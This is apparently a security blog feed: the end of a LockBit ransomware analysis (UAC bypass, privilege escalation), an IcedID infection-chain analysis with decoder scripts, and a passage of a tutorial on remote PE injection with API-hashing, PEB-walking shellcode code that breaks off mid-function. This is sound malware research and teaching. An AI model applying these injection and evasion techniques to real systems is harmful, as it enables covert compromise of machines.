The mutex name takes the form Global%.8x%.8x%.8x%.8x and is produced by hashing the RSA key with MD5, performing mutations on the result, and then hashing it with MD4.

Privilege Escalation

Impersonate as Other User

Within the Lockbit configuration, multiple user accounts can be stored in the form of usernames and passwords. These credentials can be passed to LogonUserW in order to retrieve a token representing the user.

LogonUserW Wrapper Function

Once the token of a user is retrieved it is stored in a global variable that is used at a later point in time.

Passing User Information to LogonUserW

Checking Administrator Rights

UAC Bypass

If the current process is not running as administrator and the current Windows version is Vista or above, a UAC bypass that uses the CMSTPLUA COM interface will be used, as also mentioned in this Google blog post.

UAC Bypass Check

Process Privilege Enable

In the .text section there is an array of LUIDs representing various privileges.

Privilege Array

Lockbit will loop through this table and enable each privilege in the process via RtlAdjustPrivilege.

Loop to Enable Privileges

References

References used to learn and assist with my analysis:

LockBit Ransomware v2.0

Malware Analysis Report - LockBit Ransomware v2.0

Chuong Dong

Dissecting LockBit v3 ransomware

We analyzed a variant of LockBit v3 ransomware, and rediscovered a bug that allows us to decrypt some data without paying the ransom. We also found a design flaw that may cause permanent data loss.

Calif, Nhân Huỳnh

[December Security Report] LockBit 3.0 Ransomware

PDF: https://www.somansa.com/security-report/security-note/lockbit30_202212/ Summary 1. Ransomware-as-a-service…

Naver Blog | Somansa, People Who Make Software

LockBit 3.0 - An In-Depth Analysis Of LockBit Black's Config

Shining a Light on DARKSIDE Ransomware Operations | Google Cloud Blog

The creators of DARKSIDE ransomware have launched a global crime spree affecting organizations in more than 15 countries and multiple industry verticals.

Google Cloud

IcedID Initial Attack Chain Analysis

Aleks — Mon, 29 May 2023 22:52:31 GMT

Introduction

The post will focus on the initial attack chain IcedID uses to execute its main payload. IcedID has multiple components, starting from an ISO file, before it begins executing its core module.

Specifically, the article will be divided into the following sections:

Initial Execution: Walkthrough of the initial execution of IcedID.
First Stage Execution - Unpacking: Unpacking routine of the IcedID first stage.
First Stage Execution - Main Logic Execution: Core execution of the IcedID first stage.
Second Stage Payload Downloading: Download and execution of the second stage.
Execution of Core Module: Execution of the core IcedID module.

The sample used for analysis was retrieved from a Malware Traffic Analysis post. Specifically, the initial ISO file used during this infection has the hash of E2963BA47D2E07A98EAFBD2EF56FFC6AE0E0C483E5E8E1FB1F24F8516ABD246A.

Initial Execution

The initial execution of the IcedID sample begins with an ISO file that is mounted by a user.

IcedID ISO File

Inside the mounted ISO file the user is presented with a LNK and a hidden folder.

Contents of IcedID ISO File

The hidden folder contains more files, including the IcedID payload and other files that facilitate its execution.

Contents of Sub Folder in IcedID ISO File

When the document.lnk is clicked it will invoke a JS file formingGuying.js in the scabs folder.

LNK Execution Path

When the formingGuying.js file is invoked by the document.lnk, it will in turn call a Batch script and pass a parameter to it.

Javascript Executed by LNK File

The Batch script will invoke the packed IcedID first stage, which exists in the form of a DLL file. The rundll command is not hardcoded in this Batch script; a portion of it is passed as a parameter. Only the "ll" is present in the command, and the rest comes from the parameter passed to the Batch script.

Batch Script Executed by Javascript File

The z.txt packaged in the ISO is not used and appears to contain random text. This may be an attempt to decrease the entropy created from the packed DLL file.

Benign File with Text

The roars.jpg also appears to be benign and unused during the process. This may also be an attempt to reduce entropy.

Benign Image File

The following acts as a diagram to summarize the initial execution chain:

Initial Access Diagram

First Stage Execution - Unpacking

The first stage IcedID payload takes the form of a DLL with an extremely large .data section. This is the result of the true first stage being packed and hidden within the .data section.

Large .data Section in IcedID First Stage

The packed DLL contains multiple exports, however, only the export with the ordinal of 1 will be used since that is what is invoked by the Batch script in the ISO file.

Exports from Packed IcedID First Stage DLL

Shellcode Decoding

During the execution of the packed IcedID first stage DLL, encoded shellcode is placed into a memory buffer allocated by VirtualAlloc with Read, Write, and Execute permissions.

Packed IcedID DLL Allocates RWX Memory Space

In the packed first stage DLL, the shellcode is stored in an encoded format. Decoding is done through a simple XOR loop with the key 0x1B.

Decode Unpacking Shellcode via an XOR Loop

After the shellcode is copied into memory and decoded, a call is used to enter the buffer with the shellcode.

Begin Execution Decoding Shellcode

Inside the shellcode the first stage loader from the .d section will be decoded and mapped into memory. Following this the shellcode will transfer control to the entrypoint of the first stage loader.

Execution of Unpacked IcedID First Stage

At this point the IcedID sample has been unpacked and reveals a new executable.

Unpacked IcedID First Stage Section Layout

First Stage Execution - Main Logic Execution

Config Decryption

The IcedID first stage stores its configuration in a PE data section; in this case it is in the last section, named .d. The total length of the configuration is 0x80 bytes, with the first 0x40 being the configuration and the latter 0x40 being the XOR key to decode it.

IcedID Configuration and XOR Key from .d Section

The decoding routine will loop through each byte, and use the value 0x40 bytes ahead of the current byte as the XOR key value. The following is a script that will decode the configuration file:

```python
import pefile
import binascii

file_name = "sample.bin"
section_config_name = ".d"

def byte_xor(ba1, ba2):
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])

def decode_config(config_data):

    # The sample has a hardcoded size of 0x80, 0x40 for the config and 0x40 for the XOR key
    encoded_config_raw = config_data[0:0x40] 
    xor_key_raw = config_data[0x40:0x80]
    encoded_config = binascii.hexlify(config_data[0:0x40])
    xor_key = binascii.hexlify(config_data[0x40:0x80])

    print("Encoded Config: ", encoded_config.decode())
    print("XOR Key Stream: ", xor_key.decode())

    decoded_config = byte_xor(bytes(list(encoded_config_raw)), bytes(list(xor_key_raw)))
    return decoded_config

def config_extract(filename):
    pe = pefile.PE(filename)
    for pe_section in pe.sections:
        if pe_section.Name.decode("utf-8").strip("\x00") == section_config_name:
            print("[+] Found Section: " + pe_section.Name.decode("utf-8").strip("\x00"))

            # Get raw decoded config
            raw_config = decode_config(pe_section.get_data())

            # Print campaign ID (Reverse the bytes to make it big endian)
            raw_id = binascii.hexlify(raw_config[0:4])
            reverse_id = []

            for index in range(0,len(raw_id),2):
                reverse_id.append(raw_id[index:index+2])

            reverse_id.reverse()
            print("Campaign ID: ", int(b''.join(reverse_id), 16))

            # Print C2 Domain
            print("C2 Domain: ", end='')
            for i in range(0,len(raw_config[4:-1])):
                current_char = chr(raw_config[i+4])
                print(current_char, end='')

                if current_char == chr(0):
                    break
            print()

config_extract(file_name) # Tested with unpacked sample 406e5f1b61eb7dda498b525c8af5d8f8611a3c41ff2cdeafbc37081bdd375da7
```

IcedID Configuration Decoder

The following is a demonstration of the configuration decoder executing.

IcedID Configuration File Decoded

Information Collection

When the IcedID loader initially reaches out to the command and control server it will collect information about the system and embed it into a HTTP request as multiple cookie values. In the following screenshot six cookie values have been observed:

Information About System Sent to IcedID C2 Server

This section will cover all the cookie values and the information that is embedded in each of them.

Host and Campaign Information - __gads

The __gads cookie value will contain information about the host and IcedID campaign that was extracted from the embedded configuration. All the stored information is separated by a : character.

Host and Campaign Information

[FIRST]: Campaign tracking value from the configuration.
[SECOND]: Hardcoded “1” value – A possible version number for the software.
[THIRD]: System Uptime in Seconds (Retrieved via GetTickCount).
[FOURTH] : Number of Running Processes On System.
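The four fields above can be pulled apart with a simple split on the : separator. The sketch below is illustrative only: the function name `parse_gads`, the dictionary keys, and the assumption that every field is a decimal number are not taken from the sample, and the cookie value in the usage note is made up.

```python
def parse_gads(cookie_value):
    """Split a __gads cookie value into its four colon-separated fields.

    Assumption: every field is a decimal integer. Adjust the conversion
    if a capture shows a different encoding.
    """
    fields = cookie_value.split(":")
    if len(fields) != 4:
        raise ValueError("expected four ':'-separated fields")
    campaign_id, version, uptime_seconds, process_count = (int(f) for f in fields)
    return {
        "campaign_id": campaign_id,        # campaign tracking value from the configuration
        "version": version,                # hardcoded "1" in the analyzed sample
        "uptime_seconds": uptime_seconds,  # system uptime
        "process_count": process_count,    # number of running processes
    }
```

With a hypothetical value such as `"123456789:1:3600:87"`, the function returns a campaign ID of 123456789, version 1, an uptime of 3600 seconds, and 87 running processes.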

Windows Version Information - _gat

The _gat cookie value will store the major and minor version of the Windows operating system.

Windows Version Information

[FIRST]: Value from RTL_OSVERSIONINFOW.dwMajorVersion.
[SECOND]: Value from RTL_OSVERSIONINFOW.dwMinorVersion.

User and Computer Name Information - _u

The _u cookie value will store information about the username and hostname of the computer, along with an anti-sandbox value that is likely to be checked by the server.

User and Computer Name Information

[FIRST]: Computer NetBIOS name in ASCII, represented in hex.
[SECOND]: Username IcedID is currently running under in ASCII, represented in hex.
[THIRD]: Anti-sandbox value generated from RDTSC operations.

SID Information - __io

The __io cookie value will hold a portion of the SID of the current running user. The cookie value will look like the following:

SID Information

This value was retrieved from the following SID value:

SID Account of Current User

Processor Information - _ga

The _ga cookie will hold information about the processor, along with an anti-sandbox value.

Processor Information

[FIRST]: This value can be considered to have three bits, with each bit indicating a specific result from CPUID. These values will all be OR'd with each other to form the final decimal number.
- Bit 0: If set, CPUID.0.EBX contains “Genu”.
- Bit 1: If set, execute disable bit is available as checked in CPUID.80000001.RDX[20]
- Bit 2: If set, digital temperature sensor is supported as checked in CPUID.6.RAX[0]

[SECOND]: DWORD value from CPUID.1.EAX.
[THIRD]: Anti-sandbox value calculated from a combination of RDTSC loops that run CPUID.

[FOURTH]: Hypervisor detection value. Uses CPUID.40000000.EBX to determine the hypervisor model used.
- A zero value will indicate a physical host, and a non-zero value will indicate a hypervisor.
- In this case, '1238' refers to the ASCII bytes 'MV' from the 'VMwa' output of CPUID.40000000.EBX.
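The first _ga field can be unpacked back into its three flags as sketched below. The flag names and the function `decode_cpu_flags` are illustrative labels chosen here, not identifiers from the sample.

```python
# Bit positions as described above; the names are illustrative labels
CPU_FLAG_BITS = {
    0: "vendor_ebx_is_genu",         # CPUID leaf 0, EBX contains "Genu"
    1: "execute_disable_available",  # CPUID leaf 0x80000001, bit 20
    2: "digital_thermal_sensor",     # CPUID leaf 6, bit 0
}

def decode_cpu_flags(value):
    """Turn the decimal flag value from the _ga cookie into named booleans."""
    return {name: bool((value >> bit) & 1) for bit, name in CPU_FLAG_BITS.items()}
```

A value of 7 means all three checks passed, while a value of 5 would indicate that the vendor and thermal sensor checks passed but the execute disable bit was not reported.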

MAC Address Information - _gid

The _gid will hold a list of MAC Addresses from the host, each encoded and separated with a : character.

The cookie value will appear as follows:

MAC Address Information

The highlighted MAC Address 00685951A0C2 is actually the encoded MAC Address 00-0C-29-27-10-53.

MAC Address of Each Interface

The encoding algorithm adds each byte's index to the byte and rotates the result left by three bits to create the encoded version. To decode, the same operations are performed in reverse.

The following code acts as a proof of concept of the encoding algorithm used:

#include 
#include 
#include 

void PrintVector(std::vector targetVector) {
    for (auto value : targetVector) {
        printf("%02X ", value);
    }
}

int main()
{

    std::vector macAddress{ 0x00, 0x0C, 0x29, 0x27, 0x10, 0x53 }; // MAC Address to Encode
    std::vector encodedMacAddress;

    // Encode MAC Address
    for (size_t i = 0; i < macAddress.size(); i++) {

        // Main encoding logic here
        BYTE encodedMacAddressByte = macAddress[i] + i;
        __asm {rol encodedMacAddressByte, 3};

        encodedMacAddress.push_back(encodedMacAddressByte);
    }

    // Print original MAC Address
    printf("Original MAC Address:\t");
    PrintVector(macAddress);
    printf("\n");

    // Print encoded MAC Address
    printf("Encoded MAC Address:\t");
    PrintVector(encodedMacAddress);
    printf("\n");
}

Mac Address Encoding

The following demonstrates the output of the example program:

Mac Address Encoding Running
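
For completeness, the reverse operation can be sketched in Python. This is a minimal sketch based on the proof of concept above, not code recovered from the sample; the helper names (rol8, ror8, encode_mac, decode_mac) are made up for this example.

```python
def rol8(value: int, count: int) -> int:
    """Rotate an 8-bit value left by count bits."""
    count %= 8
    return ((value << count) | (value >> (8 - count))) & 0xFF


def ror8(value: int, count: int) -> int:
    """Rotate an 8-bit value right by count bits."""
    count %= 8
    return ((value >> count) | (value << (8 - count))) & 0xFF


def encode_mac(mac: bytes) -> bytes:
    # Add the byte index, then rotate left by 3 (same as the C++ example)
    return bytes(rol8((byte + index) & 0xFF, 3) for index, byte in enumerate(mac))


def decode_mac(encoded: bytes) -> bytes:
    # Undo the steps in reverse order: rotate right by 3, then subtract the index
    return bytes((ror8(byte, 3) - index) & 0xFF for index, byte in enumerate(encoded))


if __name__ == "__main__":
    encoded = bytes.fromhex("00685951A0C2")
    print("-".join(f"{byte:02X}" for byte in decode_mac(encoded)))  # prints 00-0C-29-27-10-53
```

Running it against the highlighted cookie value recovers the MAC address shown earlier.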

Second Stage Payload Downloading

The first stage downloads the second stage payload over HTTP, presenting it as GZIP data. The downloaded data is not actually GZIP compressed; GZIP is just a field added to the HTTP request. In reality the second stage is XOR encoded and needs to be decoded.

IcedID C2 Emulation

During the analysis of this sample the original download server was already offline. To facilitate dynamic analysis, a web server was set up to emulate the IcedID second stage download.

The following GitHub repository contains the Golang program used to serve the second stage.

Second Stage Download via HTTP

Once the second stage payload is downloaded successfully it is decoded in memory. If the download fails the program will sleep and retry.

Second Stage Decode Loop

After the second stage is downloaded, its first two bytes are checked against 0x1F8B, the magic number that marks the start of a GZIP stream.

First Two Bytes of Second Stage

Once the second stage is decoded it contains the following data at the associated offsets:

Second Stage Offsets
- 0x2: DWORD that indicates the size of license.dat
- 0x6: DWORD that indicates the size of vote32.tmp
- 0xA: Name of Folder in AppData (SignDinner)
- 0x2A: Name of IcedID core payload on disk (license.dat)
- 0xC9: Name of the Core Module Loader (vote32.tmp)
- 0x2C6: Beginning of encoded licence.dat
- 0x2C6 + size of licence.dat: vote32.tmp file
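
The offsets above can be turned into a small parser. The following Python sketch is only an illustration: it assumes the DWORDs are little-endian and that the names are null terminated strings, and the function and key names are invented for this example.

```python
import struct

GZIP_MAGIC = b"\x1f\x8b"
CORE_PAYLOAD_OFFSET = 0x2C6  # beginning of the encoded core payload


def read_c_string(data: bytes, offset: int) -> str:
    """Read a null terminated ASCII string starting at offset."""
    end = data.index(b"\x00", offset)
    return data[offset:end].decode("ascii", errors="replace")


def parse_second_stage(data: bytes) -> dict:
    """Split a decoded second stage into its names and embedded files."""
    # Two DWORD sizes at 0x2 and 0x6 (assumed little-endian)
    core_size, loader_size = struct.unpack_from("<II", data, 0x2)
    loader_offset = CORE_PAYLOAD_OFFSET + core_size
    return {
        "has_gzip_magic": data[:2] == GZIP_MAGIC,
        "folder_name": read_c_string(data, 0xA),
        "core_payload_name": read_c_string(data, 0x2A),
        "loader_name": read_c_string(data, 0xC9),
        "core_payload": data[CORE_PAYLOAD_OFFSET:loader_offset],
        "loader": data[loader_offset:loader_offset + loader_size],
    }
```

The returned core_payload is still XOR encoded at this point and has to be decoded separately.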

Both the licence.dat file and vote32.tmp file will be written to disk before starting the routine to decode the core module and execute it.

Write Licence.dat and Vote.tmp to Disk, before decoding and running core module

For visualization purposes the following screenshot is the beginning of the decoded second stage. The highlighted text reveals null terminated strings of the licence.dat file name, the SingDinner folder name where licence.dat will be written to, and the vote32.tmp file name. The authors of IcedID can easily change any of these names, however, the licence.dat is usually unchanged based on public reporting and other samples published online.

Beginning of the Decoded IcedID Second Stage

Licence.dat

The licence.dat file is arguably the most important file in the attack chain, as it contains the final IcedID core module that will be executed. The file itself is stored as a PE file with a customized PE header. The customizations include stripping the PE header and section headers and storing the fields in a non-standard format.

Because the core module is stored in a customized format, Windows cannot execute it natively. On the first run the core module is loaded and executed by the first stage; later, licence.dat is passed to a dedicated loader that is run via a scheduled task.

The licence.dat file is always stored in an encoded state and must be decoded using XOR before use.

The key for decoding this file is stored in the last 16 bytes of the file, where 4 DWORDs act as the key to the XOR decoding stream. Furthermore, every time a byte is XOR'd, two DWORDs from the key are rotated right.

The following is an example of the 16 byte key (4 DWORDs) that are used as the key in the sample analyzed in this post:

4 DWORD Bytes that act as an XOR Key

The following is a decoding function that will parse the XOR key and decode each byte of the licence.dat file. Note that we loop over sizeOfSecondStage - 0x10 bytes of the file, since the last 16 bytes (0x10 bytes) are the key. We do not want to XOR the bytes we are using as the key stream.

int DecodeRoutine(PBYTE pSecondStage, DWORD sizeOfSecondStage) {

    DWORD sizeOfSecondStageMinusXORBytes = sizeOfSecondStage - 0x10;
    PDWORD pXORBytes = (PDWORD) ((PBYTE)pSecondStage + sizeOfSecondStageMinusXORBytes);

    for (DWORD i = 0; i < sizeOfSecondStageMinusXORBytes; i++) {

        DWORD xorBytesIndex1 = i % 3;
        DWORD xorBytesIndex2 = (i + 1) % 3;

        // Construct an XOR byte based on xorBytesIndex1 and xorBytesIndex2 
        BYTE xorByte = *((PBYTE)&pXORBytes[xorBytesIndex1]) + *((PBYTE)&pXORBytes[xorBytesIndex2]);

        // XOR the licence.dat buffer with the XOR byte
        pSecondStage[i] = pSecondStage[i] ^ xorByte;

        // Rolling the DWORD that xorBytesIndex1 points to
        BYTE rollNumber = *((PBYTE)&pXORBytes[xorBytesIndex2]) & 0x7;
        DWORD bytesToRoll = pXORBytes[xorBytesIndex1];

        __asm {
            push ecx
            push ebx

            mov cl, rollNumber
            mov ebx, bytesToRoll

            ror ebx, cl
            mov bytesToRoll, ebx


            // Restore in reverse order of the pushes
            pop ebx
            pop ecx
        }

        pXORBytes[xorBytesIndex1] = ++bytesToRoll;

        // Rolling the DWORD that xorBytesIndex2 points to
        rollNumber = bytesToRoll & 0x7;
        bytesToRoll = pXORBytes[xorBytesIndex2];

        __asm {
            push ecx
            push ebx

            mov cl, rollNumber
            mov ebx, bytesToRoll

            ror ebx, cl
            mov bytesToRoll, ebx


            // Restore in reverse order of the pushes
            pop ebx
            pop ecx
        }

        pXORBytes[xorBytesIndex2] = ++bytesToRoll;

    }

    return 0;
}

Decoding Function for Licence.dat
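
For readers without an x86 MSVC toolchain, the same routine can be sketched in Python. This is a direct port of the C function above as written (including its modulo 3 key indexing), not an independently verified implementation; it assumes the key DWORDs are little-endian, and the names ror32 and decode_licence are made up for this example.

```python
import struct


def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count &= 31
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def decode_licence(blob: bytes) -> bytes:
    """Decode everything except the trailing 16 key bytes."""
    if len(blob) < 16:
        raise ValueError("buffer is too small to contain the 16 byte key")

    body = bytearray(blob[:-16])
    key = list(struct.unpack("<4I", blob[-16:]))  # working copy of the 4 DWORDs

    for i in range(len(body)):
        first = i % 3
        second = (i + 1) % 3

        # The XOR byte is the sum of the low bytes of the two selected DWORDs
        body[i] ^= ((key[first] & 0xFF) + (key[second] & 0xFF)) & 0xFF

        # Rotate each selected DWORD right, then increment it
        key[first] = (ror32(key[first], key[second] & 0x7) + 1) & 0xFFFFFFFF
        key[second] = (ror32(key[second], key[first] & 0x7) + 1) & 0xFFFFFFFF

    return bytes(body)
```

Because the key stream depends only on the key and the byte position, running the function again on the output with the original key appended returns the input, which is a convenient sanity check.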

Once decoded the licence.dat file can be separated into the following parts:

Red: The first 0x81 bytes in the file are skipped and not used.
Green: Contains the PE header data, the organization of these header attributes is specific to IcedID and does not follow a traditional PE header format.
Purple: Beginning of the data sections.

Format of the Decoded Licence.dat

The headerless PE data structure can be represented using the following struct. Only the minimum required fields are present which are used to find the associated sections, map them to memory, and then begin execution of the entrypoint.

struct PEHeader {
    ULONGLONG ImageBase;
    DWORD SizeOfImage;
    DWORD AddressOfEntryPoint;
    DWORD IATRva;
    DWORD BaseRelocationRVA;
    DWORD BaseRelocationSize;
    DWORD NumberOfSections;
};

PE Header in Headerless IcedID File

The section headers begin right after the PEHeader struct. There are a total of PEHeader->NumberOfSections number of sections, each having the size of 0x11 bytes.

struct SectionHeader {
    DWORD VirtualAddress;
    DWORD VirtualSize;
    DWORD PointerToRawData;
    DWORD SizeOfRawData;
    BYTE SectionPageProtection;
};

Section Headers in Headerless IcedID File

Finally, after the section headers finish the raw data of each section begins - just like in regular PE files.
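
The two structs above can be parsed with Python's struct module. This is a hedged sketch: it assumes the fields are packed with no padding and little-endian (which matches the stated 0x11 byte section header size), and that the header starts directly after the 0x81 skipped bytes. The function name and the HEADER_OFFSET constant are made up for this example.

```python
import struct

PE_HEADER = struct.Struct("<QIIIIII")     # 0x20 bytes, no padding
SECTION_HEADER = struct.Struct("<IIIIB")  # 0x11 bytes, no padding
HEADER_OFFSET = 0x81                      # assumption: header follows the skipped bytes

PE_FIELDS = ("ImageBase", "SizeOfImage", "AddressOfEntryPoint", "IATRva",
             "BaseRelocationRVA", "BaseRelocationSize", "NumberOfSections")
SECTION_FIELDS = ("VirtualAddress", "VirtualSize", "PointerToRawData",
                  "SizeOfRawData", "SectionPageProtection")


def parse_headerless_pe(decoded: bytes, offset: int = HEADER_OFFSET):
    """Return the custom PE header and its section headers as dictionaries."""
    header = dict(zip(PE_FIELDS, PE_HEADER.unpack_from(decoded, offset)))

    sections = []
    cursor = offset + PE_HEADER.size
    for _ in range(header["NumberOfSections"]):
        values = SECTION_HEADER.unpack_from(decoded, cursor)
        sections.append(dict(zip(SECTION_FIELDS, values)))
        cursor += SECTION_HEADER.size

    return header, sections
```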

During this analysis a decoder was created to convert the licence.dat file into a regular PE file in order to facilitate further static analysis. This GitHub repository has the source code.

The main functions of the decoder are:

Load the licence.dat file from disk.
Decode the licence.dat file in memory.
Parse the PE headers and Section headers.
Rebuild a valid PE file based on the parsed headers.

The following is an example video of the decoder in action:

Vote32.tmp

Vote32.tmp is the file that comes after licence.dat in the second stage download. Vote32.tmp is a DLL file that acts as a loader for the licence.dat. The first time IcedID executes, licence.dat will be loaded and run by the first stage. However, the core module will establish persistence in the form of a scheduled task and use Vote32.tmp to load and run the licence.dat file.

The following is an example of the persistence that the core module will set up. The DLL being executed is a copy of Vote32.tmp that takes licence.dat as input.

IcedID Core Module Persistence

Execution of Core Module

Once the customized IcedID core module header has been parsed and the sections themselves have been mapped into memory, execution of the module can begin by entering the entrypoint of the file.

Entry into Core IcedID Module Entrypoint

Remote Portable Executable Injection

Aleks — Wed, 24 May 2023 17:56:04 GMT

Introduction

This post will introduce the concept of injecting PE files into a remote process. Previously, local PE injection was discussed. However, the same technique can be altered to inject code into another remote process on the same system.

This post will describe the core injection logic and the payload that will be injected into another process, along with a potential solution of how to deal with the challenge of resolving the Import Address Table (IAT) in a remote memory address space.

Source Code for Examples

The associated code example for this post can be found at the following link.

Payload

The payload for this example will send an HTTP request to Google. This was chosen so that the payload is simple and there is visual feedback that can be seen when the payload is running. Below, the sendHTTPRequest function is responsible for sending the HTTP request.

int sendHTTPRequest() {

        LPCSTR userAgent = "agent";
        LPCSTR connectDomain = "google.com";
        LPCSTR httpRequestType = "GET";
        LPCSTR targetPath = "/test";

        HINTERNET internetHandle = InternetOpenA(userAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        if (internetHandle == NULL) {
                return -1;
        }

        DWORD_PTR dwService = (DWORD_PTR)NULL;

        HINTERNET httpHandle = InternetConnectA(internetHandle, connectDomain, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, dwService);
        if (httpHandle == NULL) {
                return -1;
        }

        HINTERNET httpRequestHandle = HttpOpenRequestA(httpHandle, httpRequestType, targetPath, NULL, NULL, NULL, 0, dwService);
        if (httpRequestHandle == NULL) {
                return -1;
        }

        BOOL result = HttpSendRequestA(httpRequestHandle, NULL, 0, NULL, 0);
        InternetCloseHandle(internetHandle);

        return 1;
}

HTTP Request Function that acts as our "Payload"

The loopHTTPConnect function will be responsible for looping through the sendHTTPRequest function every two seconds.

void loopHTTPConnect() {

        while (true) {
                Sleep(2000);
                sendHTTPRequest();
                printf("Sent HTTP Request\n");
        }

}

Function that loops through the "Payload" function

The loopHTTPConnect function will be invoked from the program's main() function. This is a standard executable file that can be run directly in Windows; however, our goal is to run it through an injector without directly invoking it.

int main() {

        printf("HTTP Payload Sending Starting\n");
        loopHTTPConnect();
}

The Payload's Main Function

Import Address Table Fixing Shellcode

When a payload has an Import Address Table (IAT) a challenge arises: we need to resolve the IAT in the target process where it is going to be executed.

Wait, why can't we resolve the IAT before injecting into a process?

When we resolve an IAT, at the core we are loading DLLs into the process and updating values that point to various functions in those DLLs.

This process needs to be completed in the process where the payload will be executed, in this case the remote process. Due to Address Space Layout Randomization (ASLR), DLLs may be loaded at different base addresses in different processes. This means that if we resolve the IAT before injecting, the addresses that point to functions will be incorrect, and the DLLs they should point to likely won't even be loaded.

There are some edge cases. If the payload does not have an IAT then this is not an issue. Moreover, if the only DLLs the payload imports from are Kernel32.dll and User32.dll then we have nothing to worry about either. This is because Kernel32.dll and User32.dll have the same base address system wide for a given boot.

To deal with this challenge we will have two different paths of injection depending on if a payload has an IAT:

Payload Has IAT
- Inject mapped payload into target process
- Inject IAT Fixing Shellcode into target process
- Invoke IAT Fixing Shellcode

Payload Does Not Have IAT
- Inject mapped payload into target process
- Invoke mapped payload entrypoint
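
The choice between the two paths comes down to whether the payload's import data directory is populated. The following Python sketch shows one way to check this from the raw PE bytes; it is an illustration only, and the function names and returned labels are invented for this example.

```python
import struct

IMPORT_DIRECTORY_INDEX = 1  # IMAGE_DIRECTORY_ENTRY_IMPORT


def import_directory_rva(pe: bytes) -> int:
    """Return the RVA of the import directory, or 0 if the file has none."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")

    optional_header = e_lfanew + 4 + 20  # signature + IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", pe, optional_header)[0]
    if magic == 0x20B:      # PE32+ (64-bit)
        directories = optional_header + 112
    elif magic == 0x10B:    # PE32 (32-bit)
        directories = optional_header + 96
    else:
        raise ValueError("unknown optional header magic")

    # NumberOfRvaAndSizes sits directly before the data directory array
    count = struct.unpack_from("<I", pe, directories - 4)[0]
    if count <= IMPORT_DIRECTORY_INDEX:
        return 0

    rva, _size = struct.unpack_from("<II", pe, directories + IMPORT_DIRECTORY_INDEX * 8)
    return rva


def choose_injection_path(pe: bytes) -> str:
    """Pick the injection path described in the two lists above."""
    if import_directory_rva(pe) != 0:
        return "iat_fixing_shellcode"
    return "direct_entrypoint"
```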

With this approach if the payload has an IAT we will indirectly invoke the payload via shellcode that has been injected into the same target process. This shellcode will have the capability to resolve all the entries in the IAT and then redirect its own execution to the entrypoint of the payload.

To construct the IAT fixing shellcode a new exported function was created in a fresh Visual Studio project. An exported function was used so the compiler keeps all the code in this single function. This function also takes one parameter: the address of the mapped payload.

__declspec(dllexport) void PositionIndependentIATResolver(const ULONG_PTR mappedPEFile)

Exported IAT Resolver Function

Why is this function made as an exported function?

Our core goal is to make an independent function that does not depend on any other part of the compiled program. Once this is done the entire function's bytes can be copied and executed.

There are many different ways to approach this. In this case the function was declared as an export to ensure the compiler does not optimize it out.

To start, the shellcode will locate the base address of Kernel32.dll. String hashing will be used to avoid any hardcoded strings in the process.

        // Through PEB find the base address of Kernel32.dll

        _PPEB pPEB = (_PPEB)__readgsqword(0x60);
        PLDR_DATA_TABLE_ENTRY pCurrentPLDRDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pPEB->pLdr->InMemoryOrderModuleList.Flink;
        PIMAGE_DOS_HEADER pKernel32Module = NULL;

        do {
                PWSTR currentModuleString = pCurrentPLDRDataTableEntry->BaseDllName.pBuffer;
                if (GetHashFromStringW(currentModuleString) == KERNEL32DLL_HASH) {
                        pKernel32Module = (PIMAGE_DOS_HEADER)pCurrentPLDRDataTableEntry->DllBase;
                        break;
                }

                pCurrentPLDRDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pCurrentPLDRDataTableEntry->InMemoryOrderModuleList.Flink;

        } while (pCurrentPLDRDataTableEntry->TimeDateStamp != 0);

        if (pKernel32Module == NULL) {
                return;
        }

Find Kernel32 Base Address

Once the base address of Kernel32.dll is found, the LoadLibraryA and GetProcAddress functions will be resolved. We require these functions to load DLLs and resolve functions when constructing the IAT.

        // Resolve LoadLibraryA and GetProcAddress (adding here so compiler does not redirect to another function)
        LOADLIBRARYA pLoadLibraryAAddress = NULL;
        GETPROCADDRESS pGetProcAddressAddress = NULL;

        PIMAGE_NT_HEADERS64 ntHeaders = (PIMAGE_NT_HEADERS64)(pKernel32Module->e_lfanew + (LPBYTE)pKernel32Module);
        PIMAGE_OPTIONAL_HEADER64 optionalHeader = (PIMAGE_OPTIONAL_HEADER64)& ntHeaders->OptionalHeader;
        DWORD imageExportDirectoryRVA = optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;

        PIMAGE_EXPORT_DIRECTORY kernel32ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(imageExportDirectoryRVA + (LPBYTE)pKernel32Module);
        PDWORD addressOfNames = (PDWORD)(kernel32ExportDirectory->AddressOfNames + (LPBYTE)pKernel32Module);
        PWORD ordinalTable = (PWORD)(kernel32ExportDirectory->AddressOfNameOrdinals + (LPBYTE)pKernel32Module);
        PDWORD addressOfFunctions = (PDWORD)(kernel32ExportDirectory->AddressOfFunctions + (LPBYTE)pKernel32Module);

        for (DWORD i = 0; i < kernel32ExportDirectory->NumberOfNames; i++) {
                LPSTR currentFunctionName = (LPSTR)(addressOfNames[i] + (LPBYTE)pKernel32Module);

                if (GetHashFromStringA(currentFunctionName) == GETPROCADDRESS_HASH) {
                        pGetProcAddressAddress = (GETPROCADDRESS)(addressOfFunctions[ordinalTable[i]] + (LPBYTE)pKernel32Module);
                }

                if (GetHashFromStringA(currentFunctionName) == LOADLIBRARYA_HASH) {
                        pLoadLibraryAAddress = (LOADLIBRARYA)(addressOfFunctions[ordinalTable[i]] + (LPBYTE)pKernel32Module);
                }

                // If both are resolved we can exit the loop
                if (pLoadLibraryAAddress != NULL && pGetProcAddressAddress != NULL) {
                        break;
                }

        }

        if (pLoadLibraryAAddress == NULL || pGetProcAddressAddress == NULL) {
                return;
        }

Resolve Required Win32 API Functions via API Hashing

Next comes the process of resolving the IAT. The following will loop through each entry in the IAT, load a DLL if required, and resolve the address of any function that the program may require during its execution.

        /*
        Step 2: Resolve the IAT
        */

